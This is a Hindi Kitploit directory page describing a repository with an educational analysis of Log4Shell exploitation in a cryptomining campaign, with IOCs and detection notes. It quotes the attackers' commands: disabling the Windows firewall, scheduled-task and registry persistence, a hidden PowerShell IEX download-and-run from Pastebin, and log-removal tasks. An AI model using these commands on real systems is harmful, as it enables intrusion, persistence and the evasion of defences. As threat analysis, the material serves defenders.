Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4j-Vulnerability — Log4Shell (CVE-2021-44228) भेद्यता का शैक्षिक विश्लेषण, क्रिप्टोकरेंसी माइनिंग अभियान में इसके शोषण का विवरण IoCs, MITRE ATT&CK मैपिंग और पहचान मार्गदर्शन के साथ। | Kitploit
उपकरण/GitHubGitHub/demining/log4j-vulnerability
समझौता संकेतक (IOC) प्रबंधनभेद्यता विश्लेषणशोषणमालवेयर विश्लेषणखतरा खुफियालर्निंग और शिक्षा
GitHubdemining/log4j-vulnerability

Log4j-Vulnerability

Log4Shell (CVE-2021-44228) भेद्यता का शैक्षिक विश्लेषण, क्रिप्टोकरेंसी माइनिंग अभियान में इसके शोषण का विवरण IoCs, MITRE ATT&CK मैपिंग और पहचान मार्गदर्शन के साथ।

रिपॉजिटरी देखें
62543 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Log4j भेद्यता



क्रिप्टोकरेंसी माइनिंग कोड में शोषण जिसने खतरनाक Log4j भेद्यता का उपयोग किया
  • ट्यूटोरियल: https://youtu.be/PNDBjoT83zA
  • ट्यूटोरियल: https://cryptodeeptech.ru/log4j-vulnerability


Log4j की पृष्ठभूमि

अलीबाबा क्लाउड सिक्योरिटी टीम ने सार्वजनिक रूप से एक गंभीर भेद्यता (CVE-2021-44228) का खुलासा किया जो Apache Log4j2 (Log4Shell) के कई संस्करणों के विरुद्ध अप्रमाणित रिमोट कोड निष्पादन को सक्षम बनाती है। कमजोर सर्वरों का शोषण हमलावरों द्वारा किसी भी प्रोटोकॉल जैसे HTTPS के माध्यम से जुड़कर और एक विशेष रूप से तैयार स्ट्रिंग भेजकर किया जा सकता है।

Log4j क्रिप्टो-माइनिंग अभियान

डार्कट्रेस ने कई ग्राहक तैनाती पर क्रिप्टो-माइनिंग का पता लगाया जो इस Log4j भेद्यता के शोषण के परिणामस्वरूप हुआ। इनमें से प्रत्येक घटना में, शोषण आउटबाउंड SSL कनेक्शन के माध्यम से हुआ जो परिधि सुरक्षा को बायपास करने और बैच (.bat) स्क्रिप्ट फ़ाइलों और कई निष्पादन योग्य फ़ाइलों को डाउनलोड करने के लिए बेस64-एन्कोडेड PowerShell स्क्रिप्ट के अनुरोध प्रतीत होते हैं, जो क्रिप्टो-माइनिंग मैलवेयर स्थापित करते हैं। गतिविधि में व्यापक अभियान संकेतक थे, जिनमें सामान्य हार्ड-कोडेड आईपी, निष्पादन योग्य फ़ाइलें और स्क्रिप्ट शामिल हैं।

हमले का चक्र उस चीज़ से शुरू होता है जो इंटरनेट से जुड़े उपकरणों की अवसरवादी स्कैनिंग प्रतीत होती है जो Log4j शोषण के लिए कमजोर VMWare Horizons सर्वरों की तलाश करती है। एक बार कमजोर सर्वर मिल जाने पर, हमलावर पीड़ित के लिए HTTP और SSL कनेक्शन बनाता है। सफल शोषण के बाद, सर्वर पोर्ट 1389 पर कॉलबैक करता है, mad_micky.bat नामक एक स्क्रिप्ट प्राप्त करता है। यह निम्नलिखित प्राप्त करता है:

  • सभी प्रोफाइल को state=off पर सेट करके विंडोज फ़ायरवॉल को अक्षम करता है
    ‘netsh advfirewall set allprofiles state off’
  • ‘netstat -ano | findstr TCP’ का उपयोग करके किसी भी प्रक्रिया की पहचान करने के लिए मौजूदा प्रक्रियाओं की खोज करता है जो अन्य माइनर इंस्टॉल को इंगित करती हैं जो पोर्ट :3333, :4444, :5555, :7777, :9000 पर काम कर रही हैं और चल रही प्रक्रियाओं को रोकता है
  • wxm.exe को चुपचाप डाउनलोड करने के लिए एक नया वेबक्लाइंट शुरू किया जाता है
  • दृढ़ता बनाने के लिए निर्धारित कार्यों का उपयोग किया जाता है। कमांड ‘schtasks /create /F /sc minute /mo 1 /tn –‘ एक कार्य शेड्यूल करता है और चेतावनियों को दबाता है, कार्य को कमांड के एक मिनट के भीतर शेड्यूल किया जाना है और नाम ‘BrowserUpdate’ दिया गया है, जो दुर्भावनापूर्ण डोमेन ‘b.oracleservice[.]top’ और हार्ड-कोडेड आईपी: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080 की ओर इशारा करता है
  • दृढ़ता के लिए RunOnce में रजिस्ट्री कुंजियाँ जोड़ी जाती हैं: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

कम से कम दो मामलों में, mad_micky.bat स्क्रिप्ट को एक HTTP कनेक्शन में प्राप्त किया गया था जिसमें उपयोगकर्ता एजेंट Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS) था। यह पहली और एकमात्र बार था जब इस नेटवर्क पर यह उपयोगकर्ता एजेंट देखा गया था। ऐसा प्रतीत होता है कि यह उपयोगकर्ता एजेंट कुछ ASUS उपकरणों द्वारा ताज़ा फ़ैक्टरी इंस्टॉल के साथ वैध रूप से उपयोग किया जाता है; हालाँकि, एक नए उपयोगकर्ता एजेंट के रूप में जो केवल इस गतिविधि के दौरान देखा गया, यह संदिग्ध है।

सफल शोषण के बाद, सर्वर स्क्रिप्ट फ़ाइलों को पुनः प्राप्त करने के लिए पोर्ट 1389 पर कॉलबैक करता है। इस उदाहरण में, /xms.ps1 एक बेस64-एन्कोडेड PowerShell स्क्रिप्ट है जो ‘mad_micky.bat’ को कॉल करने के लिए होस्ट पर निष्पादन नीति को बायपास करती है:

क्रिप्टोकरेंसी माइनिंग कोड में शोषण जिसने खतरनाक Log4j भेद्यता का उपयोग किया

चित्र 1: PowerShell स्क्रिप्ट xms.ps1 पर अतिरिक्त जानकारी

स्नैपशॉट प्रभावित सर्वर के लिए ईवेंट लॉग का विवरण देता है और सफल Log4j RCE को इंगित करता है जिसके परिणामस्वरूप mad_micky.bat फ़ाइल डाउनलोड हुई:

क्रिप्टोकरेंसी माइनिंग कोड में शोषण जिसने खतरनाक Log4j भेद्यता का उपयोग किया

चित्र 2: mad_micky.bat फ़ाइल को उजागर करने वाला लॉग डेटा

निष्पादन योग्य फ़ाइलों और स्क्रिप्ट को पुनः प्राप्त करने के लिए अतिरिक्त कनेक्शन शुरू किए गए। स्क्रिप्ट में कोरिया और यूक्रेन में स्थित दो आईपी पते थे। यूक्रेनी आईपी से निष्पादन योग्य फ़ाइल xm.exe डाउनलोड करने के लिए एक कनेक्शन बनाया गया, जो माइनर को सक्रिय करता है। माइनर, XMRig Miner (इस मामले में) एक ओपन सोर्स, क्रॉस-प्लेटफ़ॉर्म माइनिंग टूल है जो कई सार्वजनिक स्थानों से डाउनलोड के लिए उपलब्ध है। अगला देखा गया exe डाउनलोड ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4) के लिए था।

क्रिप्टोकरेंसी माइनिंग कोड में शोषण जिसने खतरनाक Log4j भेद्यता का उपयोग किया

चित्र 3: XMRig निष्पादन योग्य के संबंध में अतिरिक्त जानकारी

कोरियाई आईपी से कनेक्शन में एक अन्य स्क्रिप्ट (/2.ps1) के साथ-साथ एक निष्पादन योग्य फ़ाइल (LogBack.exe) का अनुरोध शामिल था। यह स्क्रिप्ट लॉगिंग से जुड़े चल रहे कार्यों को हटाती है, जिसमें SCM ईवेंट लॉग फ़िल्टर या PowerShell ईवेंट लॉग उपभोक्ता शामिल हैं। स्क्रिप्ट Pastebin से एक फ़ाइल का भी अनुरोध करती है, जो संभवतः Cobalt Strike बीकन कॉन्फ़िगरेशन फ़ाइल है। लॉग हटाने का कार्य शेड्यूल किए गए कार्यों और WMI के माध्यम से किया गया, जिसमें शामिल हैं: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer।

  • कॉन्फ़िग फ़ाइल (अब होस्ट नहीं की गई): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

Pastebin से अनुरोधित दूसरी फ़ाइल, हालाँकि अब Pastebin द्वारा होस्ट नहीं की गई है, schtasks कमांड का हिस्सा है, और संभवतः दृढ़ता स्थापित करने के लिए उपयोग किया जाता है:

  • schtasks /create /sc MINUTE /mo 5 /tn  “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'”  /F /ru System

निष्पादन योग्य फ़ाइल Logback.exe एक अन्य XMRig माइनिंग टूल है। उसी कोरियाई आईपी से एक config.json फ़ाइल भी डाउनलोड की गई थी। इसके बाद cmd.exe और wmic कमांड का उपयोग करके माइनर को कॉन्फ़िगर किया गया।

इन फ़ाइल डाउनलोड और माइनर कॉन्फ़िगरेशन के बाद Pastebin से अतिरिक्त कनेक्शन बनाए गए।

क्रिप्टोकरेंसी माइनिंग कोड में शोषण जिसने खतरनाक Log4j भेद्यता का उपयोग किया

चित्र 4: mad_micky.bat फ़ाइल का OSINT सहसंबंध


प्रक्रिया विवरण — mad_micky.bat फ़ाइल

टूल डाउनलोड करें